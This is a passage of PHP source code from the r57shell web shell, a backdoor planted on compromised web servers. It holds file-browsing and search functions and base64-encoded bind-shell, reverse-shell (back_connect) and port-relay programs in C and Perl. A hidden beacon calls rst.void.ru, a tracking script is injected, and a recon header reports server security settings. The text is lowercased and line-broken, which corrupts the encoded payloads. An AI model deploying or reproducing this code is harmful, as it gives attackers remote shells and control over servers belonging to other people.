return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td
class=td1 align=left>".$t2."</td></tr>";
}
if (!@function_exists("view_size"))
{
function view_size($size)
{
if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " gb";}
elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " mb";}
elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " kb";}
else {$size = $size . " b";}
return $size;
}
}
function dirfiles($dir,$types='')
{
$files = array();
if(($handle = @opendir($dir)))
{
while (false !== ($file = @readdir($handle)))
{
if ($file != "." && $file != "..")
{
if(!is_dir($dir."/".$file))
{
if($types)
{
$pos = @strrpos($file,".");
$ext = @substr($file,$pos,@strlen($file)-$pos);
if(@in_array($ext,@explode(';',$types)))
$files[] = $dir."/".$file;
}
else
$files[] = $dir."/".$file;
}
}
}
@closedir($handle);
}
return $files;
}
function dirfileswide($dir)
{
$files = array();
$dirs = array();
if(($handle = @opendir($dir)))
{
while (false !== ($file = @readdir($handle)))
{
if ($file != "." && $file != "..")
{
if(@is_dir($dir."/".$file))
{
$file = @strtoupper($file);
$dirs[$file] = '&lt;dir&gt;';
}
else
$files[$file] = @filesize($dir."/".$file);
}
}
@closedir($handle);
@ksort($dirs);
@ksort($files);
$files = @array_merge($dirs,$files);
}
return $files;
}
function dirfilesr($dir,$types='')
{
$files = array();
if(($handle = @opendir($dir)))
{
while (false !== ($file = @readdir($handle)))
{
if ($file != "." && $file != "..")
{
if(@is_dir($dir."/".$file))
$files = @array_merge($files,dirfilesr($dir."/".$file,$types));
else
{
$pos = @strrpos($file,".");
$ext = @substr($file,$pos,@strlen($file)-$pos);
if($types)
{
if(@in_array($ext,explode(';',$types)))
$files[] = $dir."/".$file;
}
else
$files[] = $dir."/".$file;
}
}
}
@closedir($handle);
}
return $files;
}
function dirprinthtmlheaders($dir)
{
$pockets = '';
$handle = @opendir($dir) or die("can't open directory $dir");
echo " <ul style='margin-left: 0px; padding-left: 20px;'>\n";
while (false !== ($file = @readdir($handle)))
{
if ($file != "." && $file != "..")
{
if(@is_dir($dir."/".$file))
{
echo " <li><b>[ $file ]</b></li>\n";
dirprinthtmlheaders($dir."/".$file);
}
else
{
$pos = @strrpos($file,".");
$ext = @substr($file,$pos,@strlen($file)-$pos);
if(@in_array($ext,array('.htm','.html')))
{
$header = '-=none=-';
$strings = @file($dir."/".$file) or die("can't open file
".$dir."/".$file);
for($a=0;$a<count($strings);$a++)
{
$pattern = '(<title>(.+)</title>)';
if(@eregi($pattern,$strings[$a],$pockets))
{
$header = "&laquo;".$pockets[2]."&raquo;";
break;
}
}
echo " <li>".$header."</li>\n";
}
}
}
}
echo " </ul>\n";
@closedir($handle);
}
class searchresult
{
var $text;
var $filestosearch;
var $resultfiles;
var $filestotal;
var $matchescount;
var $filematschescount;
var $timestart;
var $timetotal;
var $titles;
function searchresult($dir,$text,$filter='')
{
$dirs = @explode(";",$dir);
$this->filestosearch = array();
for($a=0;$a<count($dirs);$a++)
$this->filestosearch = @array_merge($this-
>filestosearch,dirfilesr($dirs[$a],$filter));
$this->text = $text;
$this->filestotal = @count($this->filestosearch);
$this->timestart = getmicrotime();
$this->matchescount = 0;
$this->resultfiles = array();
$this->filematchescount = array();
$this->titles = array();
}
function getfilestotal() { return $this->filestotal; }
function gettitles() { return $this->titles; }
function gettimetotal() { return $this->timetotal; }
function getmatchescount() { return $this->matchescount; }
function getfilematchescount() { return $this->filematchescount; }
function getresultfiles() { return $this->resultfiles; }
function searchtext($phrase=0,$case=0) {
$qq = @explode(' ',$this->text);
$delim = '|';
if($phrase)
foreach($qq as $k=>$v)
$qq[$k] = '\b'.$v.'\b';
$words = '('.@implode($delim,$qq).')';
$pattern = "/".$words."/";
if(!$case)
$pattern .= 'i';
foreach($this->filestosearch as $k=>$filename)
{
$this->filematchescount[$filename] = 0;
$filestrings = @file($filename) or @next;
for($a=0;$a<@count($filestrings);$a++)
{
$count = 0;
$curstring = $filestrings[$a];
$curstring = @trim($curstring);
$curstring = @strip_tags($curstring);
$aa = '';
if(($count = @preg_match_all($pattern,$curstring,$aa)))
{
$curstring = @preg_replace($pattern,"<span style='color:
#990000;'><b>\\1</b></span>",$curstring);
$this->resultfiles[$filename][$a+1] = $curstring;
$this->matchescount += $count;
$this->filematchescount[$filename] += $count;
}
}
}
$this->timetotal = @round(getmicrotime() - $this->timestart,4);
}
}
function getmicrotime()
{
list($usec,$sec) = @explode(" ",@microtime());
return ((float)$usec + (float)$sec);
}
$port_bind_bd_c="i2luy2x1zgugphn0zglvlmg+dqojaw5jbhvkzsa8c3ryaw5nlmg+dqojaw5jbhvkz
sa8c3lzl3r5cgvzlmg+dqojaw5jbhvkzs
a8c3lzl3nvy2tldc5opg0ki2luy2x1zgugpg5ldgluzxqvaw4uad4ncinpbmnsdwrlidxlcnjuby5opg0k
aw50ig1haw4oyxjnyyxhcmd2kq0kaw50i
gfyz2m7dqpjagfyicoqyxjndjsncnsgia0kigludcbzb2nrzmqsig5ld2zkow0kignoyxigynvmwzmwxts
ncibzdhj1y3qgc29ja2fkzhjfaw4gcmvt
b3rlow0kiglmkgzvcmsoksa9psawksb7ia0kihjlbw90zs5zaw5fzmftawx5id0gquzfsu5fvdsncibyzw
1vdguuc2lux3bvcnqgpsbodg9ucyhhdg9
pkgfyz3zbmv0pktsncibyzw1vdguuc2lux2fkzhiuc19hzgryid0gahrvbmwosu5brersx0fowsk7ia0ki
hnvy2tmzca9ihnvy2tldchbrl9jtkvulf
npq0tfu1rsrufnldapow0kiglmkcfzb2nrzmqpihblcnjvcigic29ja2v0igvycm9yiik7dqogymluzchz
b2nrzmqsichzdhj1y3qgc29ja2fkzhigk
ikmcmvtb3rllcawedewktsncibsaxn0zw4oc29ja2zklca1ktsncib3aglszsgxkq0kicb7dqogicbuzxd
mzd1hy2nlchqoc29ja2zkldasmck7dqog
icbkdxaykg5ld2zkldapow0kicagzhvwmihuzxdmzcwxktsnciagigr1cdiobmv3zmqsmik7dqogicb3cm
l0zshuzxdmzcwiugfzc3dvcmq6iiwxmck
7dqogicbyzwfkkg5ld2zklgj1zixzaxplb2yoynvmksk7dqogicbpziaoiwnocgfzcyhhcmd2wzjdlgj1z
ikpdqogicbzexn0zw0oimvjag8gd2vsy2
9tzsb0bybyntcgc2hlbgwgjiygl2jpbi9iyxnoic1piik7dqogicblbhnldqogicbmchjpbnrmkhn0zgvy
ciwiu29ycnkiktsnciagignsb3nlkg5ld
2zkktsnciagfq0kih0ncn0ncmludcbjahbhc3moy2hhciaqymfzzswgy2hhciaqzw50zxjlzckgew0kaw5
0igk7dqpmb3ioat0wo2k8c3rybgvukgvu
dgvyzwqpo2krkykgdqp7dqppzihlbnrlcmvkw2ldid09icdcbicpdqplbnrlcmvkw2ldid0gj1wwjzsgdq
ppzihlbnrlcmvkw2ldid09icdccicpdqp
lbnrlcmvkw2ldid0gj1wwjzsncn0ncmlmicghc3ryy21wkgjhc2uszw50zxjlzckpdqpyzxr1cm4gmdsnc
n0=";
$port_bind_bd_pl="iyevdxnyl2jpbi9wzxjsdqoku0hftew9ii9iaw4vymfzacatasi7dqppziaoqefs
r1ygpcaxksb7igv4axqomsk7ih0ncirms
vnuru5fue9svd0kqvjhvlswxtsncnvzzsbtb2nrzxq7dqokchjvdg9jb2w9z2v0chjvdg9iew5hbwuoj3r
jcccpow0kc29ja2v0kfmsjlbgx0lorvqs
jlnpq0tfu1rsrufnlcrwcm90b2nvbckgfhwgzgllicjdyw50ignyzwf0zsbzb2nrzxrcbii7dqpzzxrzb2
nrb3b0kfmsu09mx1npq0tfvcxtt19srvv
truferfismsk7dqpiaw5kkfmsc29ja2fkzhjfaw4ojexju1rftl9qt1juleloqureul9btlkpksb8fcbka
wugiknhbnqgb3blbibwb3j0xg4iow0kbg
lzdgvukfmsmykgfhwgzgllicjdyw50igxpc3rlbibwb3j0xg4iow0kd2hpbguomskncnsncmfjy2vwdchd
t05olfmpow0kawyoisgkcglkpwzvcmspk
q0kew0kzgllicjdyw5ub3qgzm9yayigawygkcfkzwzpbmvkicrwawqpow0kb3blbibtverjtiwipczdt05
oijsncm9wzw4gu1ret1vulci+jknptk4i
ow0kb3blbibtverfulisij4mq09otii7dqplegvjicrtsevmtcb8fcbkawugchjpbnqgq09otiaiq2fudc
blegvjdxrlicrtsevmtfxuijsncmnsb3n
lienptk47dqplegl0ida7dqp9dqp9";
$back_connect="iyevdxnyl2jpbi9wzxjsdqp1c2ugu29ja2v0ow0kjgntzd0gimx5bngiow0kjhn5c3r
lbt0gj2vjag8gimb1bmftzsatywaio2vj
ag8gimbpzgaioy9iaw4vc2gnow0kjda9jgntzdsncir0yxjnzxq9jefsr1zbmf07dqokcg9ydd0kqvjhvl
sxxtsncirpywrkcj1pbmv0x2f0b24ojhr
hcmdldckgfhwgzgllkcjfcnjvcjogjcfcbiipow0kjhbhzgrypxnvy2thzgryx2lukcrwb3j0lcakawfkz
hipihx8igrpzsgirxjyb3i6icqhxg4ikt
sncirwcm90bz1nzxrwcm90b2j5bmftzsgndgnwjyk7dqpzb2nrzxqou09ds0vulcbqrl9jtkvulcbtt0nl
x1nuukvbtswgjhbyb3rvksb8fcbkawuoi
kvycm9yoiakivxuiik7dqpjb25uzwn0kfnpq0tfvcwgjhbhzgryksb8fcbkawuoikvycm9yoiakivxuiik
7dqpvcgvukfnurelolcaipiztt0nlrvqi
ktsncm9wzw4ou1ret1vulcaipiztt0nlrvqiktsncm9wzw4ou1rervjslcaipiztt0nlrvqiktsncnn5c3
rlbsgkc3lzdgvtktsncmnsb3nlkfnurel
oktsncmnsb3nlkfnure9vvck7dqpjbg9zzshtverfulipow==";
$back_connect_c="i2luy2x1zgugphn0zglvlmg+dqojaw5jbhvkzsa8c3lzl3nvy2tldc5opg0ki2luy
2x1zgugpg5ldgluzxqvaw4uad4ncmludc
btywlukgludcbhcmdjlcbjagfyicphcmd2w10pdqp7dqogaw50igzkow0kihn0cnvjdcbzb2nrywrkcl9p
bibzaw47dqogy2hhcibybxnbmjfdpsjyb
satziaioyancibkywvtb24omswwktsncibzaw4uc2lux2zhbwlsesa9iefgx0lorvq7dqogc2lulnnpbl9
wb3j0id0gahrvbnmoyxrvashhcmd2wzjd
ksk7dqogc2lulnnpbl9hzgrylnnfywrkcia9igluzxrfywrkcihhcmd2wzfdktsgdqogynplcm8oyxjndl
sxxsxzdhjszw4oyxjndlsxxskrmstzdhj
szw4oyxjndlsyxskpoyancibmzca9ihnvy2tldchbrl9jtkvulcbtt0nlx1nuukvbtswgsvbquk9ut19uq
1apidsgdqogawygkchjb25uzwn0kgzklc
aoc3rydwn0ihnvy2thzgryicopiczzaw4sihnpemvvzihzdhj1y3qgc29ja2fkzhipksk8mckgew0kicag
cgvycm9ykcjblv0gy29ubmvjdcgpiik7d
qogicblegl0kdapow0kih0ncibzdhjjyxqocm1zlcbhcmd2wzbdktsncibzexn0zw0ocm1zktsgia0kigr
1cdiozmqsidapow0kigr1cdiozmqsidep
ow0kigr1cdiozmqsidipow0kigv4zwnskcivymlul3noiiwic2gglwkilcbovuxmktsncibjbg9zzshmzc
k7ia0kfq==";
$datapipe_c="i2luy2x1zgugphn5cy90exblcy5opg0ki2luy2x1zgugphn5cy9zb2nrzxquad4ncinpb
mnsdwrlidxzexmvd2fpdc5opg0ki2luy2
x1zgugpg5ldgluzxqvaw4uad4ncinpbmnsdwrlidxzdgrpby5opg0ki2luy2x1zgugphn0zgxpyi5opg0k
i2luy2x1zgugpgvycm5vlmg+dqojaw5jb
hvkzsa8dw5pc3rklmg+dqojaw5jbhvkzsa8bmv0zgiuad4ncinpbmnsdwrlidxsaw51ec90aw1llmg+dqo
jawzkzwygu1rsrvjst1incmv4dgvybibj
agfyicpzexnfzxjybglzdftdow0kzxh0zxjuigludcbzexnfbmvycjsncmnoyxigknvuzgvmid0gilvuzg
vmaw5lzcblcnjvcii7dqpjagfyicpzdhj
lcnjvcihlcnjvcikgia0kaw50igvycm9yoyagdqp7ia0kawygkgvycm9yid4gc3lzx25lcnipdqpyzxr1c
m4gdw5kzwy7dqpyzxr1cm4gc3lzx2vycm
xpc3rbzxjyb3jdow0kfq0ki2vuzglmdqoncm1haw4oyxjnyywgyxjndikgia0kicbpbnqgyxjnyzsgia0k
icbjagfyicoqyxjndjsgia0keyanciaga
w50igxzb2nrlcbjc29jaywgb3nvy2s7dqogiezjteugkmnmawxlow0kicbjagfyigj1zls0mdk2xtsncia
gc3rydwn0ihnvy2thzgryx2luigxhzgry
lcbjywrkciwgb2fkzhi7dqogigludcbjywrkcmxlbia9ihnpemvvzihjywrkcik7dqogigzkx3nldcbmzh
nylcbmzhnlow0kicbzdhj1y3qgag9zdgv
udcaqadsnciagc3rydwn0ihnlcnzlbnqgknm7dqogigludcbuynl0ow0kicb1bnnpz25lzcbsb25nige7d
qogihvuc2lnbmvkihnob3j0ig9wb3j0ow
0kdqogiglmichhcmdjice9idqpihsnciagicbmchjpbnrmkhn0zgvyciwivxnhz2u6icvzigxvy2fscg9y
dcbyzw1vdgvwb3j0ihjlbw90zwhvc3rcb
iisyxjndlswxsk7dqogicagcmv0dxjuidmwow0kicb9dqogigegpsbpbmv0x2fkzhioyxjndlszxsk7dqo
giglmicghkgggpsbnzxrob3n0ynluyw1l
kgfyz3zbm10pksamjg0kicagicagishoid0gz2v0ag9zdgj5ywrkcigmyswgncwgquzfsu5fvckpksb7dq
ogicagcgvycm9ykgfyz3zbm10pow0kica
gihjldhvybiayntsnciagfq0kicbvcg9ydca9igf0b2woyxjndlsyxsk7dqogigxhzgrylnnpbl9wb3j0i
d0gahrvbnmokhvuc2lnbmvkihnob3j0ks
hhdg9skgfyz3zbmv0pksk7dqogiglmicgobhnvy2sgpsbzb2nrzxqouezfsu5fvcwgu09ds19tvfjfqu0s
ielqufjpve9fvenqkskgpt0gltepihsnc
iagicbwzxjyb3ioinnvy2tldcipow0kicagihjldhvybiaymdsnciagfq0kicbsywrkci5zaw5fzmftawx
5id0gahrvbnmoquzfsu5fvck7dqogigxh
zgrylnnpbl9hzgrylnnfywrkcia9igh0b25skdapow0kicbpziaoymluzchsc29jaywgjmxhzgrylcbzax
plb2yobgfkzhipkskgew0kicagihblcnj
vcigiymluzcipow0kicagihjldhvybiaymdsnciagfq0kicbpziaobglzdgvukgxzb2nrlcaxkskgew0ki
cagihblcnjvcigibglzdgvuiik7dqogic
agcmv0dxjuidiwow0kicb9dqogiglmicgobmj5dca9igzvcmsokskgpt0gltepihsnciagicbwzxjyb3io
imzvcmsiktsnciagicbyzxr1cm4gmja7d
qogih0nciagawygkg5iexqgpiawkq0kicagihjldhvybiawow0kicbzzxrzawqoktsnciagd2hpbgugkch
jc29jaya9igfjy2vwdchsc29jaywgjmnh
zgrylcamy2fkzhjszw4pksahpsatmskgew0kicagignmawxlid0gzmrvcgvukgnzb2nrlcjykyipow0kic
agiglmicgobmj5dca9igzvcmsokskgpt0
gltepihsnciagicagigzwcmludgyoy2zpbgusici1mdagzm9yazogjxncbiisihn0cmvycm9ykgvycm5vk
sk7dqogicagicbzahv0zg93bihjc29jay
wyktsnciagicagigzjbg9zzshjzmlszsk7dqogicagicbjb250aw51ztsnciagicb9dqogicagawygkg5i
exqgpt0gmcknciagicagigdvdg8gz290c
29jazsnciagicbmy2xvc2uoy2zpbgupow0kicagihdoawxlich3ywl0cglkkc0xlcbovuxmlcbxtk9iqu5
hksa+idapow0kicb9dqogihjldhvybiay
mdsncg0kigdvdhnvy2s6dqogiglmicgob3nvy2sgpsbzb2nrzxqouezfsu5fvcwgu09ds19tvfjfqu0sie
lqufjpve9fvenqkskgpt0gltepihsncia
gicbmchjpbnrmkgnmawxllcaintawihnvy2tlddogjxncbiisihn0cmvycm9ykgvycm5vksk7dqogicagz
290bybxdwl0mtsnciagfq0kicbvywrkci
5zaw5fzmftawx5id0gac0+af9hzgrydhlwztsnciagb2fkzhiuc2lux3bvcnqgpsbodg9ucyhvcg9ydck7
dqogig1lbwnwesgmb2fkzhiuc2lux2fkz
hisiggtpmhfywrkciwgac0+af9szw5ndggpow0kicbpziaoy29ubmvjdchvc29jaywgjm9hzgrylcbzaxp
lb2yob2fkzhipkskgew0kicagigzwcmlu
dgyoy2zpbgusici1mdagy29ubmvjddogjxncbiisihn0cmvycm9ykgvycm5vksk7dqogicagz290bybxdw
l0mtsnciagfq0kicb3aglszsaomskgew0
kicagiezex1pfuk8ojmzkc3ipow0kicagiezex1pfuk8ojmzkc2upow0kicagiezex1nfvchjc29jaywmz
mrzcik7dqogicagrkrfu0vukgnzb2nrlc
zmzhnlktsnciagicbgrf9trvqob3nvy2ssjmzkc3ipow0kicagiezex1nfvchvc29jaywmzmrzzsk7dqog
icagawygkhnlbgvjdcgymcwgjmzkc3isi
e5vtewsiczmzhnllcbovuxmksa9psatmskgew0kicagicagznbyaw50zihjzmlszswgijuwmcbzzwxly3q
6icvzxg4ilcbzdhjlcnjvcihlcnjubykp
ow0kicagicagz290bybxdwl0mjsnciagicb9dqogicagawygkezex0ltu0vukgnzb2nrlczmzhnyksb8fc
bgrf9ju1nfvchjc29jaywmzmrzzskpihs
nciagicagiglmicgobmj5dca9ihjlywqoy3nvy2ssynvmldqwotypksa8psawkq0kcwdvdg8gcxvpddi7d
qogicagicbpziaokhdyaxrlkg9zb2nrlg
j1zixuynl0kskgpd0gmckncglnb3rvihf1axqyow0kicagih0gzwxzzsbpziaorkrfsvntrvqob3nvy2ss
jmzkc3ipihx8iezex0ltu0vukg9zb2nrl
czmzhnlkskgew0kicagicagawygkchuynl0id0gcmvhzchvc29jayxidwysnda5nikpidw9idapdqojz29
0bybxdwl0mjsnciagicagiglmicgod3jp
dguoy3nvy2ssynvmlg5iexqpksa8psawkq0kcwdvdg8gcxvpddi7dqogicagfq0kicb9dqoncibxdwl0mj
onciagc2h1dgrvd24ob3nvy2ssmik7dqo
gignsb3nlkg9zb2nrktsncibxdwl0mtonciagzmzsdxnokgnmawxlktsnciagc2h1dgrvd24oy3nvy2ssm
ik7dqogcxvpdda6dqogigzjbg9zzshjzm
lszsk7dqogihjldhvybiawow0kfq==";
$datapipe_pl="iyevdxnyl2jpbi9wzxjsdqp1c2ugsu86olnvy2tlddsncnvzzsbqt1njwdsncirsb2nh
bhbvcnqgpsakqvjhvlswxtsncirob3n0i
cagicagpsakqvjhvlsxxtsncirwb3j0icagicagpsakqvjhvlsyxtsncirkywvtb249mtsnciresvigpsb
1bmrlzjsncir8id0gmtsncmlmicgkzgfl
bw9ukxsgjhbpzca9igzvcms7igv4axqgawygjhbpzdsgzgllicikisigdw5szxnzigrlzmluzwqojhbpzc
k7ifbpu0lyojpzzxrzawqoksbvcibkawu
giiqhijsgfq0kjw8gpsaoj3bvcnqnid0+icrsb2nhbhbvcnqsj3rvcg9ydccgpt4gjhbvcnqsj3rvag9zd
ccgpt4gjghvc3qpow0kjgfoid0gsu86ol
nvy2tlddo6su5fvc0+bmv3kcdmb2nhbfbvcnqnid0+icrsb2nhbhbvcnqsj1jldxnljya9piaxlcdmaxn0
zw4nid0+idewksb8fcbkawugiiqhijsnc
irtsud7j0niteqnfsa9icdjr05pukunow0kjg51bsa9ida7dqp3aglszsaomskgeyancirjaca9icrhac0
+ywnjzxb0kck7iglmicghjgnoksb7ihby
aw50ifnurevsuiaijcfcbii7ig5lehq7ih0ncisrjg51btsncirwawqgpsbmb3jrkck7dqppziaoiwrlzm
luzwqojhbpzckpihsgchjpbnqgu1rervj
sicikivxuijsgfsancmvsc2lmicgkcglkid09idapihsgjgfolt5jbg9zzsgpoybsdw4oxcvvlcaky2gsi
crudw0poyb9ia0kzwxzzsb7icrjac0+y2
xvc2uoktsgfq0kfq0kc3viifj1bib7dqptesgkbywgjgnolcakbnvtksa9iebfow0kbxkgjhroid0gsu86
olnvy2tlddo6su5fvc0+bmv3kcdqzwvyq
wrkcicgpt4gjg8tpnsndg9ob3n0j30sj1blzxjqb3j0jya9piakby0+eyd0b3bvcnqnfsk7dqppziaoisr
0ackgeyblegl0ida7ih0ncm15icrmadsn
cmlmicgkby0+eydkaxinfskgeyakzmggpsbtew1ib2w6omdlbnn5bsgpoybvcgvukcrmacwgij4kby0+ey
dkaxinfs90dw5uzwwkbnvtlmxvzyipig9
yigrpzsaijceioyb9dqoky2gtpmf1dg9mbhvzacgpow0kjhrolt5hdxrvzmx1c2goktsncndoawxlicgky
2ggfhwgjhroksb7dqptesakcmluid0gii
i7dqp2zwmojhjpbiwgzmlszw5vkcrjacksidepid0gmsbpziaky2g7dqp2zwmojhjpbiwgzmlszw5vkcr0
acksidepid0gmsbpziakdgg7dqptesgkc
m91dcwgjgvvdxqpow0kc2vszwn0kcryb3v0id0gjhjpbiwgdw5kzwysicrlb3v0id0gjhjpbiwgmtiwkts
ncmlmicghjhjvdxqgicymicahjgvvdxqp
iht9dqptesaky2j1zmzlcia9iciiow0kbxkgjhridwzmzxigpsaiijsncmlmicgky2ggjiygkhzlyygkzw
91dcwgzmlszw5vkcrjacksidepihx8ihz
lyygkcm91dcwgzmlszw5vkcrjacksidepkskgew0kbxkgjhjlc3vsdca9ihn5c3jlywqojgnolcakdgj1z
mzlciwgmtaynck7dqppziaoiwrlzmluzw
qojhjlc3vsdckpihsncnbyaw50ifnurevsuiaijcfcbii7dqplegl0ida7dqp9dqppziaojhjlc3vsdca9
psawksb7igv4axqgmdsgfq0kfq0kawygk
cr0acagjiygich2zwmojgvvdxqsigzpbgvubygkdggplcaxksagfhwgdmvjkcryb3v0lcbmawxlbm8ojhr
okswgmskpksb7dqptesakcmvzdwx0id0g
c3lzcmvhzcgkdggsicrjynvmzmvylcaxmdi0ktsncmlmicghzgvmaw5lzcgkcmvzdwx0kskgeybwcmludc
btverfuligiiqhxg4ioyblegl0ida7ih0
ncmlmicgkcmvzdwx0id09idapihtlegl0ida7fq0kfq0kawygkcrmacagjiygicr0ynvmzmvyksb7khbya
w50icrmacakdgj1zmzlcik7fq0kd2hpbg
ugkg15icrszw4gpsbszw5ndggojhridwzmzxipksb7dqptesakcmvzid0gc3lzd3jpdguojhrolcakdgj1
zmzlciwgjgxlbik7dqppziaojhjlcya+i
dapihskdgj1zmzlcia9ihn1ynn0cigkdgj1zmzlciwgjhjlcyk7fsancmvsc2uge3byaw50ifnurevsuia
ijcfcbii7fq0kfq0kd2hpbgugkg15icrs
zw4gpsbszw5ndggojgnidwzmzxipksb7dqptesakcmvzid0gc3lzd3jpdguojgnolcaky2j1zmzlciwgjg
xlbik7dqppziaojhjlcya+idapihsky2j
1zmzlcia9ihn1ynn0cigky2j1zmzlciwgjhjlcyk7fsancmvsc2uge3byaw50ifnurevsuiaijcfcbii7f
q0kfx19dqo=";
$c1 =
"phnjcmlwdcbsyw5ndwfnzt0iamf2yxnjcmlwdci+ag90bg9nx2pzpsixljaio2hvdgxvz19ypsiik01hd
ggucmfuzg9tkckriizzptgxnja2
jmltptemcj0ik2vzy2fwzshkb2n1bwvudc5yzwzlcnjlcikriizwzz0ik2vzy2fwzsh3aw5kb3cubg9jyx
rpb24uahjlzik7zg9jdw1lbnquy29va2l
lpsjob3rsb2c9mtsgcgf0ad0vijsgag90bg9nx3irpsimyz0ikyhkb2n1bwvudc5jb29rawu/ilkioijoi
ik7pc9zy3jpchq+phnjcmlwdcbsyw5ndw
fnzt0iamf2yxnjcmlwddeumsi+ag90bg9nx2pzpsixljeio2hvdgxvz19ykz0ijmo9iisobmf2awdhdg9y
lmphdmffbmfibgvkkck/ilkioijoiik8l
3njcmlwdd48c2nyaxb0igxhbmd1ywdlpsjqyxzhc2nyaxb0ms4yij5ob3rsb2dfanm9ijeumii7ag90bg9
nx3irpsimd2g9iitzy3jlzw4ud2lkdggr
j3gnk3njcmvlbi5ozwlnahqriizwed0ikygokg5hdmlnyxrvci5hchboyw1llnn1ynn0cmluzygwldmppt
0itwljiikpp3njcmvlbi5jb2xvckrlchr
oonnjcmvlbi5waxhlberlchroktwvc2nyaxb0pjxzy3jpchqgbgfuz3vhz2u9imphdmfzy3jpchqxljmip
mhvdgxvz19qcz0ims4zijwvc2nyaxb0pj
xzy3jpchqgbgfuz3vhz2u9imphdmfzy3jpchqipmhvdgxvz19ykz0ijmpzpsirag90bg9nx2pzo2rvy3vt
zw50lndyaxrlkci8ysbocmvmpsdodhrwo
i8vy2xpy2suag90bg9nlnj1lz84mtywnicgdgfyz2v0psdfdg9wjz48aw1niciriibzcmm9j2h0dha6ly9
oaxq0lmhvdgxvzy5yds9jz2ktymlul2hv
dgxvzy9jb3vudd8ik2hvdgxvz19ykyimjybib3jkzxi9mcb3awr0ad0xighlawdodd0xigfsdd0xpjwvyt
4iktwvc2nyaxb0pjxub3njcmlwdd48ysb
ocmvmpwh0dha6ly9jbgljay5ob3rsb2cucnuvpzgxnja2ihrhcmdldd1fdg9wpjxpbwdzcmm9imh0dha6l
y9oaxq0lmhvdgxvzy5yds9jz2ktymlul2
hvdgxvzy9jb3vudd9zptgxnja2jmltpteiigjvcmrlcj0wd2lkdgg9ijeiighlawdodd0imsigywx0psji
b3rmb2cipjwvyt48l25vc2nyaxb0pg==";
$c2 =
"pcetluxpdmvjbnrlcm5ldcbjb3vudgvyls0+phnjcmlwdcbsyw5ndwfnzt0ismf2yvnjcmlwdci+pcetl
q0kzg9jdw1lbnqud3jpdguojzxh
ighyzwy9imh0dha6ly93d3cubgl2zwludgvybmv0lnj1l2nsawnriiankw0kj3rhcmdldd1fymxhbms+pg
ltzybzcmm9imh0dha6ly9jb3vudgvylnl
hzhjvlnj1l2hpdd90ntiunjtyjysncmvzy2fwzshkb2n1bwvudc5yzwzlcnjlcikrkch0exblb2yoc2nyz
wvukt09j3vuzgvmaw5lzccppycnog0kjz
tzjytzy3jlzw4ud2lkdggrjyonk3njcmvlbi5ozwlnahqrjyonkyhzy3jlzw4uy29sb3jezxb0ad8ncnnj
cmvlbi5jb2xvckrlchroonnjcmvlbi5wa
xhlberlchrokskrjzsnk01hdggucmfuzg9tkckrdqoniibhbhq9imxpdmvpbnrlcm5ldc5ydtog7+7q4of
g7e4g9+jx6+4g7/du8ezu8vdu4idoio/u
8exy6pll6+xpiofgidi0ipfg8eaiiccrdqonym9yzgvyptagd2lkdgg9mcbozwlnahq9md48l2e+jykvly
0tpjwvc2nyaxb0pjwhls0vtgl2zuludgv
ybmv0ls0+";
echo $head;
echo '</head>';
if(empty($_post['cmd'])) {
$serv = array(127,192,172,10);
$addr=@explode('.', $_server['server_addr']);
$current_version = str_replace('.','',$version);
if (!in_array($addr[0], $serv)) {
@print "<img
src=\"http://rst.void.ru/r57shell_version/version.php?img=1&version=".$current_ver
sion."\" border=0 height=0 width=0>";
@readfile
("http://rst.void.ru/r57shell_version/version.php?version=".$current_version."");}
}
echo '<body bgcolor="#e4e0d8"><table width=100% cellpadding=0 cellspacing=0
bgcolor=#000000>
<tr><td bgcolor=#cccccc width=160><font face=verdana size=2>'.ws(1).'&nbsp;
<font face=webdings size=6><b>!</b></font><b>'.ws(2).'r57shell '.$version.'</b>
</font></td><td bgcolor=#cccccc><font face=verdana size=-2>';
echo ws(2);
echo "<b>".date ("d-m-y h:i:s")."</b>";
echo ws(2).$lb." <a href=".$_server['php_self']."?phpinfo
title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb;
echo ws(2).$lb." <a href=".$_server['php_self']."?phpini
title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb;
echo ws(2).$lb." <a href=".$_server['php_self']."?cpu
title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb;
echo ws(2).$lb." <a href=".$_server['php_self']."?mem
title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb;
echo ws(2).$lb." <a href=".$_server['php_self']."?tmp
title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb;
echo ws(2).$lb." <a href=".$_server['php_self']."?delete
title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>";
echo ws(2);
echo (($safe_mode)?("safe_mode: <b><font color=green>on</font></b>"):("safe_mode:
<b><font color=red>off</font></b>"));
echo ws(2);
echo "php version: <b>".@phpversion()."</b>";
$curl_on = @function_exists('curl_version');
echo ws(2);
echo "curl: ".(($curl_on)?("<b><font color=green>on</font></b>"):("<b><font
color=red>off</font></b>"));
echo ws(2);
echo "mysql: <b>";
$mysql_on = @function_exists('mysql_connect');
if($mysql_on){
echo "<font color=green>on</font></b>"; } else { echo "<font
color=red>off</font></b>"; }
echo ws(2);
echo "mssql: <b>";
$mssql_on = @function_exists('mssql_connect');
if($mssql_on){echo "<font color=green>on</font></b>";}else{echo "<font
color=red>off</font></b>";}
echo ws(2);
echo "postgresql: <b>";
$pg_on = @function_exists('pg_connect');
if($pg_on){echo "<font color=green>on</font></b>";}else{echo "<font
color=red>off</font></b>";}
echo ws(2);
echo "oracle: <b>";
$ora_on = @function_exists('ocilogon');
if($ora_on){echo "<font color=green>on</font></b>";}else{echo "<font
color=red>off</font></b>";}
echo "<br>".ws(2);
echo "disable functions : <b>";
if(''==($df=@ini_get('disable_functions'))){echo "<font
color=green>none</font></b>";}else{echo "<font color=red>$df</font></b>";}
$free = @diskfreespace($dir);
if (!$free) {$free = 0;}
$all = @disk_total_space($dir);
if (!$all) {$all = 0;}
$used = $all-$free;
$used_percent = @round(100/($all/$free),2);
echo "<br>".ws(2)."hdd free : <b>".view_size($free)."</b> hdd total :
<b>".view_size($all)."</b>";
echo '</font></td></tr><table>
<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
<tr><td align=right width=100>';
echo $font;
if(!$windows){
